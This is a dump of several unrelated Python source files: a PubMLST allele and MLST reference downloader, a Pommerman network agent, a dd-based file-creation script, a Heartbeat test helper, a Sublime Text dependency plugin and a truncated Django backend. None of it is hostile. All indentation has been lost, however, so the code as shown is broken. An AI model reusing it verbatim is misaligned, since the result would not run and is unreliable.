true_values=['True','TRUE','Yes']
LocusTableBoolColumns = ['isORF','isPeptide','expected']
referenceSubdirectory = 'reference_sequences/' ##This should be a subdirectory somewhere
### This retrieves all the information from PubMLST, and provides the allele sequences files when requested.
## I am putting lookup tables in a separate object, but the MLST table is still here. I can't decide whether to extract it so that it is kept with
## other lookup tables or whether it should stay here because it is actively retrieved from the PubMLST site.
script_version = 0.15 #9 Sept 2015
script_subversion =0
def readAlleleReferences(filename):
alleles = {}
if os.path.isfile(filename):
refDir = os.path.dirname(filename)
alleles = dict()
try:
with open(filename) as fin:
for line in fin:
if line[0] != '#':
(gene,allele_file) = line.rstrip().split('\t') ##Filename is relative to local_allele_file
alleles[gene] = os.path.join(refDir,allele_file)
except IOError:
print("Warning: unable to open local allele master file: {}".format(filename))
return alleles
##Setting dir is where to find information about alleles to use
## Reference Dir is place to store downloaded alleles (perhaps to be deprecated)
## Output dir is a place to keep a permanent copy of the references used in this analysis
reqUpdate='RequireUpdate'
class AlleleReferenceManager:
def __init__(self,settingDir,referenceDir):
##Location of settings
self.setting_directory = settingDir
##Basic information about the loci to evaluate
LocusFrameRaw = pd.read_table(os.path.join(settingDir,LocusTableFile),comment='#',dtype=str)
LocusFrameRaw.set_index(keys='locus',inplace=True,drop=False,verify_integrity=True)
LocusFrameRaw = utilities.castColumnsToBool(LocusFrameRaw,LocusTableBoolColumns,true_values)
self.LocusFrame = LocusFrameRaw.dropna(subset=LocusTableEssential,how='any')
dif = len(LocusFrameRaw) - len(self.LocusFrame)
if dif > 0:
print("Dropping {} loci due to missing information. Check settings file".format(dif))
if len(self.LocusFrame) == 0:
print("Error: no loci identified")
# if reqUpdate in self.LocusFrame:
# print("Evaluating {} sequences".format(len(self.LocusFrame)))
self.allele_data = dict()
self.MLST_profile_file = os.path.join(settingDir,"MLST_profiles.txt")
#store a master copy of allele files here; keep as backup
self.reference_directory = referenceDir
if not os.path.isdir(self.reference_directory):
os.mkdir(self.reference_directory)
##TODO check if this ever should be replaced with a version in the working dir
self.local_allele_file = self.reference_directory + 'allele_reference.txt'
self.local_profile_file = self.reference_directory + 'MLST_reference.txt'
self.MLST_schemes = dict()
#Tell main program to wait if necessary
self.updated = False ##For tracking if there was background updating
def updateReferences(self, waitForCompletion = True, EssentialOnly = False):
##At some point, there will be a thread in here and the option to not wait for completion
### Read the URLs for allele reference files; Retrieve them if they are not local
# with open(self.allele_references_file) as allele_file:
# allele_lines = allele_file.readlines()
# allele_references = dict([line.split() for line in allele_lines if line != ''])
######### Note: handle blank lines better
remote_references = False
for URL in self.LocusFrame['URL']:
if not os.path.isfile(URL):
remote_references = True
break
#### Keep track of genes that have reference files
if remote_references:
print(" Updating reference files...\n")
local_references = self.downloadAlleleReferences(EssentialOnly)
## TODO: should this be in load references?
#if a gene does not have a user-specified basename, try to infer it from the file
# Attempted to make this compatible with both PubMLST.org conventions and MLST.org conventions.
# This search will fail if the allele name has anything but numbers in it (or if the gene name ends with a number).
names_updated = False
nameRE = re.compile(r'>(.*\D)\d+$')
for (gene, filename) in local_references.items():
if gene in self.LocusFrame.index and not pd.isnull(self.LocusFrame.loc[gene,'basename']): ##test that the name works
with open(filename) as fin:
for line in fin:
if re.match(">",line):
if not re.match(">"+self.LocusFrame.loc[gene,'basename'],line):
raise RuntimeError('Specified basename for {} is inconsistant with usage in allele file'.format(gene))
else:
names_updated = True
name = None
with open(filename) as fin:
for line in fin:
nameMatch = nameRE.match(line)
if nameMatch:
new_name = nameMatch.group(1)
if name == None:
name = new_name
elif name != new_name:
raise RuntimeError('Inconsistant naming in file {}; {} and {}.'.format(filename,name,new_name))
self.LocusFrame.loc[gene,'basename'] = name
if names_updated:
out_file = os.path.join(self.setting_directory,"names_updated.tab")
self.LocusFrame.to_csv(out_file,sep='\t')
raise ValueError("You did not provide a key to permit interpretation of the names in the gene files. We made suggestions. Try replacing your locus list files with {}".
format(out_file))
#Get profiles
local_profile_files = dict()
with open(self.MLST_profile_file) as profiles:
for line in profiles:
values = line.split()
URL = values[1]
name = values[0]
local_profiles = self.reference_directory + name + '_profiles.txt'
if not (EssentialOnly and os.path.isfile(local_profiles)):
if EssentialOnly:
print('Cannot proceed without a MLST profile list for {}'.format(name))
print('To override automatic download, put a properly formatted profile list from PubMLST here:'.format(local_profiles))
print('Downloading MLST profile for {}'.format(name))
handle = urllib.request.urlopen(URL)
temp = local_profiles+'.tmp'
with open(temp,'wb') as fout:
fout.write(handle.read())
##TODO: if local_profiles exists, we should check that temp is a good replacement. However, I don't know what qualifies as "good", since records could theoretically be removed legitimately
if name == 'Nm':
try:
self.reformatNmCC(temp,local_profiles)
except:
print("Warning: failed to reformat new MLST profile table at {}".format(temp))
else:
os.rename(temp,local_profiles)
local_profile_files[name] = local_profiles
#Save a list of the local reference files so that this can be used even if the server is down
with open(self.local_profile_file,'w') as fout:
local_dir = os.path.dirname(self.local_profile_file)
for (gene, filename) in local_profile_files.items():
file_dir,file_name = os.path.split(filename)
rel_dir = os.path.relpath(file_dir,local_dir)
rel_file = os.path.join(rel_dir,file_name)
fout.write(gene + "\t" + rel_file + "\n")
##THis is a logical placeholder for when the above code is threaded
if waitForCompletion:
self.updated = False ##
#~ t = multiprocessing.Process(target=worker)
#~ t.start()
#~ t.join()
else:
print("Background updating not implemented yet")
#~ t = threading.Thread(target=worker)
#~ t.start()
#~ self.updated = updateThread ## The thread would need to
##Takes a dict of address for the ultimate reference files (allele_references), downloads them, and saves the list in the "local_allele_file"
def downloadAlleleReferences(self,EssentialOnly=False):
downloaded_references = dict()
####Use the existing local references by default
default_refs = readAlleleReferences(self.local_allele_file)
for gene in self.LocusFrame.index:
if gene in default_refs:
if os.path.isfile(default_refs[gene]):
downloaded_references[gene] = default_refs[gene]
##Try to download the files, or copy them from the setting directory to the reference directory
# genes_remaining = set(self.LocusFrame.index.tolist())
# if EssentialOnly:
# genes_remaining = [x for x in genes_remaining if x not in downloaded_references]
# for gene in genes_remaining:
success = True
for (gene, row) in self.LocusFrame.iterrows():
url = row['URL']
# url = self.LocusFrame.loc[gene,'URL']
dest_file = os.path.normpath(os.path.join(self.reference_directory,gene+".fasta"))
try:
if os.path.isfile(url):
shutil.copyfile(url,dest_file)
elif os.path.isfile(os.path.join(self.setting_directory,url)):
shutil.copyfile(os.path.join(self.setting_directory,url),dest_file)
else: ##Download
if (EssentialOnly and gene in default_refs):
if os.path.abspath(dest_file) != os.path.abspath(default_refs[gene]):
shutil.copyfile(default_refs[gene],dest_file)
else:
if EssentialOnly:
print("{} not in local allele file: {}".format(gene,self.local_allele_file))
temp_file = dest_file+'.tmp'
handle = urllib.request.urlopen(url)
with open(temp_file,'wb') as fout:
fout.write(handle.read())
##Validate
new_seqs = SeqIO.to_dict(SeqIO.parse(temp_file,'fasta'))
if len(new_seqs) == 0:
raise ValueError('Failed to parse PubMLST download file for {}'.format(gene))
failed_seq = None
if not os.path.isfile(dest_file): ##Confirm that old sequences are in the new file
print("Downloaded new sequence for {}".format(gene))
else:
old_seqs = SeqIO.to_dict(SeqIO.parse(dest_file,'fasta'))
for seq_name,seq in old_seqs.items():
if seq_name in new_seqs:
if seq.seq != new_seqs[seq_name].seq:
failed_seq = seq_name
print("Old seq ({}bp) does not match new seq ({}bp)".format(len(seq),len(new_seqs[seq_name])))
break
else:
failed_seq = seq_name
break
if failed_seq is None:
print("Validated new sequence for {}".format(gene))
if failed_seq is None:
os.rename(temp_file,dest_file) #only overwrite once download is complete
else:
print("Failed to validate new sequences for {}, due to absence of {}".format(gene,failed_seq))
print("The URL is: \n\t"+url)
with open(temp_file) as pubmlst_download:
line = pubmlst_download.readline()
print("The first line of the downloaded file is: \n\t"+line)
raise ValueError('Failed to validate PubMLST download file for {}'.format(gene))
except ValueError as e:
print('Download Error for {}; relying on backup file {}. Message : {}'.format(url,self.local_allele_file,e))
# genes_remaining.remove(gene)
if not (reqUpdate in row.index) or (row[reqUpdate] in ['True','TRUE','Yes']):
success = False
else:
print("Continuing, but you may want to see if newly downloaded file is usable:"+temp_file)
else:
downloaded_references[gene] = dest_file ##the exception will not get here
# genes_remaining.remove(gene)
#Save a list of the local reference files so that this can be used even if the server is down
with open(self.local_allele_file,'w') as fout:
local_dir = os.path.dirname(self.local_allele_file)
for (gene, filename) in downloaded_references.items():
file_dir,file_name = os.path.split(filename)
rel_dir = os.path.relpath(file_dir,local_dir)
rel_file = os.path.join(rel_dir,file_name)
fout.write(gene + "\t" + rel_file + "\n")
if not success:
sys.exit("Failure to download files. Fatal error. Run in --debug mode if you want to run without fresh download")
return downloaded_references
##our database reformats the clonal complex names from pubmed
##This whole thing should be wrapped in a try block
def reformatNmCC(self,file_in, file_out):
profile_table = pd.read_table(file_in,header=0)
cc_list = profile_table['clonal_complex'].unique()
print("Loading profile table for {}. Has {} profiles in {} clonal complexes".format('Nm',len(profile_table),len(cc_list)))
cc_re = re.compile('ST-((/?\d+)+) complex(.+)?')##'complex' may need to be stripped from end
for idx, row in profile_table.iterrows():
CC_ID = row['clonal_complex']
if (CC_ID == '') or pd.isnull(CC_ID):
CC_ID = 'unassigned CC for {}'.format(row['ST'])
else:
try:
cc_match = cc_re.match(CC_ID)
if cc_match:
refST = cc_match.group(1)
extraID = cc_match.group(3)
CC_ID = "CC"+refST
if extraID is not None:
CC_ID += extraID.replace('complex','').rstrip()
else:
print("Warning: unable to interpret the clonal complex for ST {}".format(row['ST']))
except:
print('Exception while to reformatting {}'.format(CC_ID))
profile_table.loc[idx,'clonal_complex'] = CC_ID #pylint: disable=no-member
if os.path.exists(file_out):
print("Warning: overwriting file {}".format(file_out))
profile_table.to_csv(file_out,'\t',index=False)
def backgroundUpdateOccured(self):
##This may need to aqcuire a lock on 'updated' so that it waits for the updating thread to complete
raise Exception("Not implemented")
return self.updated ##This will return True if the analysis was performed prior to downloading the
#
# def readAlleleRefNames(self,filename):
# ## load user-defined basenames for allele identification files
# allele_reference_name = dict()
# if os.path.isfile(filename):
# try:
# with open(filename) as fin:
# lines = fin.readlines()
# allele_reference_name = dict([line.rstrip().split('\t') for line in lines if line[0] != '#'])
# except:
# print("Warning: unable to open basename file for reference alleles: {}".format(filename))
# return allele_reference_name
def readAlleleLookupTables(self,filename):
lookup_tables = dict()
if os.path.isfile(filename):
try:
lookup_tables = dict([line.rstrip().split('\t') for line in open(filename) if line[0] != '#'])
except IOError:
print("Warning: unable to open file for allele lookup tables: {}".format(filename))
return lookup_tables
def getAlleleFromQuery(self,locus,allele_name):
query_file = self.getAlleleRefName(locus)
allele_ID = self.extractAlleleID(locus, allele_name)
with open(query_file) as query_handle:
query_seqs = SeqIO.to_dict(SeqIO.parse(query_handle, "fasta"))
try:
best_seq = query_seqs[allele_name]
except KeyError:##This should never happen
print("Failure to find query {} in sequence list {}. Contact developer".format(allele_name,query_file))
raise
my_seq = best_seq
return allele_ID,my_seq
def extractAlleleID(self,locus,allele_name):
basename = self.getAlleleRefName(locus)
allele_ID = None
try:
allele_ID = re.search(basename+'(.+)$',allele_name).group(1)
except Exception:
print('Failure to identify {} in {}'.format(basename,allele_name))
return allele_ID
def loadReferences(self,backupDir = None):
##Make backup copy
if backupDir is not None:
try:
shutil.rmtree(backupDir)
shutil.copytree(self.reference_directory,backupDir)
except shutil.Error:
print("Error: unable to make backup copy of references...")
##Alleles
local_alleles = readAlleleReferences(self.local_allele_file)
##validate
gene_set = set(self.LocusFrame.index.tolist())
local_set = set(local_alleles.keys())
if local_set < gene_set:
print("Error: local allele file has only {}/{} alleles.".format(len(local_set),len(gene_set)))
for gene, file in local_alleles.items():
if gene in self.LocusFrame.index: ##Do not add new records to LocusFrame -- this is the master controller
self.LocusFrame.loc[gene,'allele_sequences'] = os.path.normpath(file)
if self.LocusFrame.loc[gene,'isORF']: ##Only testing for internal stops
try:
analysis_dict = seq_utilities.ORF_analysis(file)
analysis_frame = pd.DataFrame(analysis_dict)
for i in analysis_frame.index:
analysis_frame.loc[i,'Allele_ID'] = self.extractAlleleID(gene, analysis_frame.loc[i,'Allele'])
analysis_frame.set_index('Allele_ID',inplace=True)
self.allele_data[gene] = analysis_frame
try:
analysis_frame.to_csv(os.path.join(backupDir,'Allele_info_{}.tab'.format(gene)),sep='\t')
except:
print("Warning: failed to save info about alleles")
except (IOError, KeyError):
self.allele_data[gene] = None
print("Failed to open allele file for gene {}; contact developer.".format(gene))
print(file)
##TODO: may need to check that all loci have a reference sequence
print("Evaluating alleles for {} loci".format(sum(self.LocusFrame['allele_sequences'].notnull())))
Peps = self.LocusFrame['isPeptide'] == True
print("Treating {} sequences as peptides".format(sum(Peps)))
ORFs = self.LocusFrame['isORF'] == True
print("Treating {} genes as ORFs".format(sum(ORFs)))
ORF_alleles = self.LocusFrame[ORFs].index
print("Treating the following genes as ORFs: {}".format(', '.join(ORF_alleles)))
# self.query_basenames = self.readAlleleRefNames(self.allele_reference_names_file)
##MLST profiles
self.MLST_schemes = dict()
if os.path.isfile(self.local_profile_file):
refDir = os.path.dirname(self.local_profile_file)
with open(self.local_profile_file) as profiles:
for line in profiles:
values = line.split()
profile_file = os.path.join(refDir,values[1])
profile_name = values[0]
assert os.path.isfile(profile_file), "MLST scheme {} does not have a file: {}".format(profile_name,profile_file)
self.MLST_schemes[profile_name] = profile_file
else:
print("No local MLST profiles found")
def getGenesWithPeptides(self):
result = defaultdict(list)
pep_frame = self.LocusFrame[self.LocusFrame['DNA_version'].notnull()]
for _,row in pep_frame.iterrows():
result[row['DNA_version']].append(row['locus'])
return result
def getMLSTschemes(self):
return self.MLST_schemes.copy()
def getAlleleRefFile(self,gene):
# result = self.local_alleles[gene] if gene in self.local_alleles else None
# return result
result = self.LocusFrame.loc[gene,'allele_sequences'] if gene in self.LocusFrame.index else None
return result
def getAllRefFiles(self):
return self.LocusFrame['allele_sequences'].dropna().tolist()
def getAlleleRefName(self,gene):
# return self.query_basenames[gene]
result = self.LocusFrame.loc[gene,'basename'] if gene in self.LocusFrame.index else None
return result
def getAlleleDataFrame(self,gene):
result = self.allele_data[gene] if gene in self.allele_data else None
return result
def getLoci(self):
return self.LocusFrame['locus'].tolist()
def isORF(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'isORF'] == True)
def expected_gene(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'expected'] == True)
def isPep(self,gene):
return (gene in self.LocusFrame.index) and (self.LocusFrame.loc[gene,'isPeptide'] == True)
import argparse
def main():
## Simple argparse
parser = argparse.ArgumentParser()
parser.add_argument('--version','-V',action='version',version='%(prog)s {}.{}'.format(script_version,script_subversion))
parser.add_argument('-s','--setting_dir',help='Location of setting files')
parser.add_argument('-r','--reference_dir',help='Location of reference files')
# parser.add_argument('-o','--output_dir',help='Location to write any output')
parser.add_argument('--update',help="Update files in reference dir")
args = parser.parse_args()
homeDir = os.path.dirname(os.path.realpath(__file__))
settingDir = args.setting_dir if args.setting_dir else os.path.join(homeDir,'settings/')
referenceDir = args.reference_dir if args.reference_dir else os.path.join(homeDir,referenceSubdirectory)
# outputDir = args.output_dir if args.output_dir else os.getcwd()
arm = AlleleReferenceManager(settingDir,referenceDir)
if args.update:
arm.updateReferences(True)
if __name__ == "__main__":
main()
# _arm.updateAllFiles()
|
multiplayer_over_net_agent.py
|
'''An example docker agent.'''
import json
import time
import os
import threading
import requests
import docker
from . import BaseAgent
from .. import utility
from .. import characters
class MultiPlayerAgent(BaseAgent):
"""The Docker Agent that Connects to a Docker container where the character runs."""
def __init__(self,
# docker_image,
port,
server='http://localhost',
character=characters.Bomber):
# docker_client=None,):
# env_vars=None):
super(MultiPlayerAgent, self).__init__(character)
# self._docker_image = docker_image
# self._docker_client = docker_client
# if not self._docker_client:
# self._docker_client = docker.from_env()
# self._docker_client.login(
# os.getenv("PLAYGROUND_DOCKER_LOGIN"),
# os.getenv("PLAYGROUND_DOCKER_PASSWORD"))
# self._acknowledged = False # Becomes True when the container is ready.
self._server = server
self._port = port
self._timeout = 32
self._container = None
self._is_human_controlled = True
# self._env_vars = env_vars or {}
# Pass env variables starting with DOCKER_AGENT to the container.
# for key, value in os.environ.items():
# if not key.startswith("DOCKER_AGENT_"):
# continue
# env_key = key.replace("DOCKER_AGENT_", "")
# self._env_vars[env_key] = value
# Start the docker agent if it is on this computer. Otherwise, it's far
# away and we need to tell that server to start it.
# if 'localhost' in server:
# container_thread = threading.Thread(
# target=self._run_container, daemon=True)
# container_thread.start()
# print("Waiting for docker agent at {}:{}...".format(server, port))
# self._wait_for_docker()
# else:
# request_url = "{}:8000/run_container".format(server)
# request_json = {
# 'docker_image': self._docker_image,
# 'env_vars': self._env_vars,
# 'port': port
# }
# requests.post(request_url, json=request_json)
# waiting_thread = threading.Thread(
# target=self._wait_for_docker, daemon=True)
# waiting_thread.start()
# def _run_container(self):
# print("Starting container...")
# self._container = self._docker_client.containers.run(
# self._docker_image,
# detach=True,
# auto_remove=True,
# ports={10080: self._port},
# environment=self._env_vars)
# for line in self._container.logs(stream=True):
# print(line.decode("utf-8").strip())
# def _wait_for_docker(self):
# """Wait for network service to appear. A timeout of 0 waits forever."""
# timeout = self._timeout
# backoff = .25
# max_backoff = min(timeout, 16)
# if timeout:
# # time module is needed to calc timeout shared between two exceptions
# end = time.time() + timeout
# while True:
# try:
# now = time.time()
# if timeout and end < now:
# print("Timed out - %s:%s" % (self._server, self._port))
# raise
# request_url = '%s:%s/ping' % (self._server, self._port)
# req = requests.get(request_url)
# self._acknowledged = True
# return True
# except requests.exceptions.ConnectionError as e:
# print("ConnectionError: ", e)
# backoff = min(max_backoff, backoff * 2)
# time.sleep(backoff)
# except requests.exceptions.HTTPError as e:
# print("HTTPError: ", e)
# backoff = min(max_backoff, backoff * 2)
# time.sleep(backoff)
# except docker.errors.APIError as e:
# print("This is a Docker error. Please fix: ", e)
# raise
def init_agent(self, id, game_type, env_info=None):
super(MultiPlayerAgent, self).init_agent(id, game_type)
request_url = "http://localhost:{}/init_agent".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"id": json.dumps(id, cls=utility.PommermanJSONEncoder),
"game_type": json.dumps(game_type, cls=utility.PommermanJSONEncoder),
"env_info": json.dumps(env_info, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in init_agent()!')
def notify_obs(self, obs, waiting=False):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
waiting_serialized = json.dumps(waiting, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/notify_obs".format(self._port)
try:
req = requests.post(
request_url,
timeout=None, # temporarily make it infinity
json={
"obs":
obs_serialized,
"waiting":
waiting_serialized
})
except requests.exceptions.Timeout as e:
print('Timeout!')
def act(self, obs, action_space):
obs_serialized = json.dumps(obs, cls=utility.PommermanJSONEncoder)
request_url = "http://localhost:{}/action".format(self._port)
try:
req = requests.post(
request_url,
# timeout=0.15,
timeout=None, # temporarily make it infinity
json={
"obs":
obs_serialized,
"action_space":
json.dumps(action_space, cls=utility.PommermanJSONEncoder)
})
action = req.json()['action']
except requests.exceptions.Timeout as e:
print('Timeout!')
# TODO: Fix this. It's ugly.
num_actions = len(action_space.shape)
if num_actions > 1:
return [0] * num_actions
else:
return 0
return action
def die(self):
# notify the death to the agent
request_url = "http://localhost:{}/die".format(self._port)
try:
req = requests.get(
request_url,
timeout=0.5
)
except requests.exceptions.Timeout as e:
print('Timeout in episode_end()!')
self._character.die()
def episode_end(self, reward):
request_url = "http://localhost:{}/episode_end".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={
"reward": json.dumps(reward, cls=utility.PommermanJSONEncoder)
})
except requests.exceptions.Timeout as e:
print('Timeout in episode_end()!')
def shutdown(self):
request_url = "http://localhost:{}/shutdown".format(self._port)
try:
req = requests.post(
request_url,
timeout=0.5,
json={ })
except requests.exceptions.Timeout as e:
print('Timeout in shutdown()!')
# print("Stopping container..")
# if self._container:
# try:
# return self._container.remove(force=True)
# except docker.errors.NotFound as e:
# return True
|
create_files.py
|
#!/usr/bin/env python
from subprocess import call
import sys
from threading import Thread
from Queue import Queue
queue = Queue()
num = 9 #num threads and
#size = 10240 #creates 10MB image
size = 102400 #creates 100MB image
def createImage(i,q,dest = "/tmp"):
"""creates N 10mb identical image files"""
value = "%sMB " % str(size/1024)
while True:
i = q.get()
print "Creating %s image #%s in %s inside of thread %s" % (value,i,dest,i)
cmd = "dd if=/dev/zero of=%s/10mbfile.%s bs=1024 count=%s" % (dest,i,size)
status = call(cmd, shell=True)
if status != 0:
print "Trouble creating image files", err
sys.exit(1)
q.task_done()
def controller():
#spawn N worker pool threads
for i in range(num):
worker = Thread(target=createImage, args=(i,queue))
worker.setDaemon(True)
worker.start()
#populate queue with N jobs
for n in range(num):
queue.put(n)
print "Main Thread Waiting"
queue.join()
print "Done"
if __name__ == "__main__":
controller()
|
heartbeat.py
|
import os
import sys
import http.server
import threading
sys.path.append(os.path.join(os.path.dirname(
__file__), '../../../libbeat/tests/system'))
from beat.beat import TestCase
from time import sleep
class BaseTest(TestCase):
@classmethod
def setUpClass(self):
self.beat_name = "heartbeat"
self.beat_path = os.path.abspath(
os.path.join(os.path.dirname(__file__), "../../"))
super(BaseTest, self).setUpClass()
def start_server(self, content, status_code, **kwargs):
class HTTPHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
self.send_response(status_code)
self.send_header('Content-Type', 'application/json')
self.end_headers()
if "write_delay" in kwargs:
sleep(float(kwargs["write_delay"]))
self.wfile.write(bytes(content, "utf-8"))
server = http.server.HTTPServer(('localhost', 0), HTTPHandler)
thread = threading.Thread(target=server.serve_forever)
thread.start()
return server
@staticmethod
def http_cfg(id, url):
return """
- type: http
id: "{id}"
schedule: "@every 1s"
timeout: 3s
urls: ["{url}"]
"""[1:-1].format(id=id, url=url)
@staticmethod
def tcp_cfg(*hosts):
host_str = ", ".join('"' + host + '"' for host in hosts)
return """
- type: tcp
schedule: "@every 1s"
timeout: 3s
hosts: [{host_str}]
"""[1:-1].format(host_str=host_str)
def last_output_line(self):
return self.read_output()[-1]
def write_dyn_config(self, filename, cfg):
with open(self.monitors_dir() + filename, 'w') as f:
f.write(cfg)
def monitors_dir(self):
return self.working_dir + "/monitors.d/"
def assert_last_status(self, status):
self.assertEqual(self.last_output_line()["monitor.status"], status)
def setup_dynamic(self, extra_beat_args=[]):
os.mkdir(self.monitors_dir())
self.render_config_template(
reload=True,
reload_path=self.monitors_dir() + "*.yml",
flush_min_events=1,
)
self.proc = self.start_beat(extra_args=extra_beat_args)
|
packagemeta.py
|
"""
Copyright (c) 2012, Daniel Skinner <[email protected]>
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this
list of conditions and the following disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice,
this list of conditions and the following disclaimer in the documentation
and/or other materials provided with the distribution.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""
import logging
import threading
import os
import sublime
import sublime_plugin
# PackageControl = __import__("Package Control")
def logger(level):
sh = logging.StreamHandler()
sh.setLevel(logging.DEBUG)
sh.setFormatter(logging.Formatter('%(levelname)s:%(name)s:%(message)s'))
log = logging.getLogger("PackageMeta")
log.setLevel(level)
log.addHandler(sh)
return log
log = logger(logging.WARNING)
_requires = {}
_receivers = {}
class Receiver(object):
"""Base class for receiving broadcast data.
Subclassing this will automatically instantiate and register the class for receiving
broadcast data. For example, to receive data from a broadcast given the name "lint_java",
the following is all that is needed:
class LintJavaReceiver(packagemeta.Receiver):
channel = "lint_java"
def receive(self, data):
pass # handle data
The type of data received is determined by the broadcaster. Multiple receivers can watch
the same channel and all receivers will be notified.
Attributes:
channel: key used to register a subclass for receiving broadcast data by the same name.
"""
channel = None
def receive(self, data):
pass
def _register_receivers():
"""Find all subclasses of Receiver and register them for receiving broadcast data"""
subs = Receiver.__subclasses__()
for sub in subs:
if sub.channel is None:
log.warn("Receiver %s failed to define `channel` member.", sub)
continue
_receivers[sub.channel] = _receivers.get(sub.channel, []) + [sub()]
# TODO could be better
sublime.set_timeout(_register_receivers, 3000)
def broadcast(channel, data):
"""Broadcast data on a given channel.
"""
if not isinstance(channel, (str, unicode)):
raise Exception("")
log.info("received broadcast for %s with data: %s", channel, data)
def _broadcast():
for receiver in _receivers.get(channel, []):
receiver.receive(data)
threading.Thread(target=_broadcast).start()
class PackageMetaBroadcastCommand(sublime_plugin.ApplicationCommand):
"""
"""
def run(self, channel, data):
broadcast(channel, data)
def is_visible(self):
return False
def exists(*pkgs):
for pkg in pkgs:
if not os.path.exists(os.path.join(sublime.packages_path(), pkg)):
return False
return True
def requires(*pkgs):
"""Decor for registering external dependencies within a module.
Use of this decor should be constrained to the module level if poossible.
When used, this registers the original module to be associated with a
package dependency for the associated function. If the package is not
available, then the function is not run, and `None` will be returned. For
example:
@packagemeta.requires("ExternalPackage")
def configure_externalpackage(settings):
settings.set("externalpackage_setting", True)
Since the package is associated with the module, a quick panel command
is also available for installing all dependencies via PackageControl.
See `packagemeta.InstallRequires` for more info.
"""
def _decor(fn):
global _requires
s = _requires.get(fn.__module__, set())
for pkg in pkgs:
s.add(pkg)
_requires[fn.__module__] = s
def _fn(*args, **kwargs):
if exists(pkg):
return fn(*args, **kwargs)
return _fn
return _decor
class PackageMetaSetRequiresCommand(sublime_plugin.WindowCommand):
"""WindowCommand to allow external plugins to register dependencies.
In cases where an external plugin doesn't want to import PackageMeta directly,
dependencies can still be registered via this window command. For example:
def set_requires():
kwargs = {
"module": set_requires.__module__,
"pkgs": ["PackageA", "PackageB"]
}
sublime.active_window().run_command("package_meta_set_requires", kwargs)
See `PackageMetaInstallRequiresCommand` for details on showing a quick panel
to install dependencies.
"""
def run(self, module=None, pkgs=[]):
log.debug("received module %s", module)
log.debug("received pkgs %s", pkgs)
global _requires
s = _requires.get(module, set())
for pkg in pkgs:
s.add(pkg)
_requires[module] = s
def is_visible(self):
return False
class PackageMetaInstallRequiresCommand(sublime_plugin.WindowCommand):
"""Base class for quick panel to install required pkgs
If a plugin uses `packagemeta.requires`, subclassing this
WindowCommand will provide a quick panel to list and install
missing packages. For example, in the plugin:
class PluginInstallRequiresCommand(packagemeta.PackageMetaInstallRequiresCommand):
def is_visible(self):
return self.visible()
And include the following in the plugin's sublime-commands file:
{
"caption": "Plugin: Install Dependencies",
"command": "plugin_install_requires"
}
The command will only be visible if a plugin passed to `packagemeta.requires`
is not installed.
If instead you're interacting with packagemeta via `run_command`, you'll first
need to declare required packages at an appropriate time for the type of plugin
being developed. See `PackageMetaSetRequiresCommand` for details on registering
dependencies.
Once dependencies are registered, create a WindowCommand such as:
class PluginInstallRequiresCommand(sublime_plugin.WindowCommand):
def run(self):
self.window.run_command("package_meta_install_requires", {"module": self.__module__})
Note: In all cases, only packages not installed will be displayed.
"""
def run(self, module=None):
log.debug("InstallRequiresCommand.run received module %s", module)
self.module = module
if not self.get_pkgs():
return
self.options = self.get_missing_pkgs()
if not self.options:
return
if len(self.options) > 1:
self.options.insert(0, "All Packages")
self.window.show_quick_panel(self.options, self.on_done)
def on_done(self, picked):
if picked == -1:
return
option = self.options[picked]
if option == "All Packages":
for name in self.options[1:]:
self.install_pkg(name)
else:
self.install_pkg(option)
def get_pkgs(self):
global _requires
return _requires.get(self.get_module(), [])
def get_module(self):
if not hasattr(self, "module") or self.module is None:
return self.__module__
return self.module
def get_missing_pkgs(self):
p = sublime.packages_path()
log.debug("packages_path: %s", p)
installed = os.listdir(p)
return [pkg for pkg in self.get_pkgs() if pkg not in installed]
@requires("Package Control")
def install_pkg(self, name):
"""
thread = PackageControl.PackageInstallerThread(PackageControl.PackageManager(), name, None)
thread.start()
PackageControl.ThreadProgress(thread, 'Installing package %s' % name,
'Package %s successfully %s' % (name, "installed"))
"""
pass
def is_visible(self):
return False
def visible(self):
if not self.get_missing_pkgs():
return False
return True
|
django.py
|
import json
import logging
import threading
from functools import partial
from django.http import HttpResponse, HttpRequest
from .httpbased import HttpContext, HttpHandler, run_event_loop
from .utils import make_applications
from ..utils import STATIC_PATH, iscoroutinefunction, isgeneratorfunction, get_free_port
logger = logging.getLogger(__name__)
class DjangoHttpContext(HttpContext):
backend_name = 'django'
def __init__(self, request: HttpRequest):
self.request = request
self.response = HttpResponse()
def request_obj(self):
"""返回当前请求对象"""
return self.request
def request_method(self):
"""返回当前请求的方法,大写"""
return self.request.method
def request_headers(self):
"""返回当前请求的header字典"""
return self.request.headers
def request_url_parameter(self, name, default=None):
"""返回当前请求的URL参数"""
return self.request.GET.get(name, default=default)
def request_json(self):
"""返回当前请求的json反序列化后的内容,若请求数据不为json格式,返回None"""
try:
return json.loads(self.request.body.decode('utf8'))
except Exception:
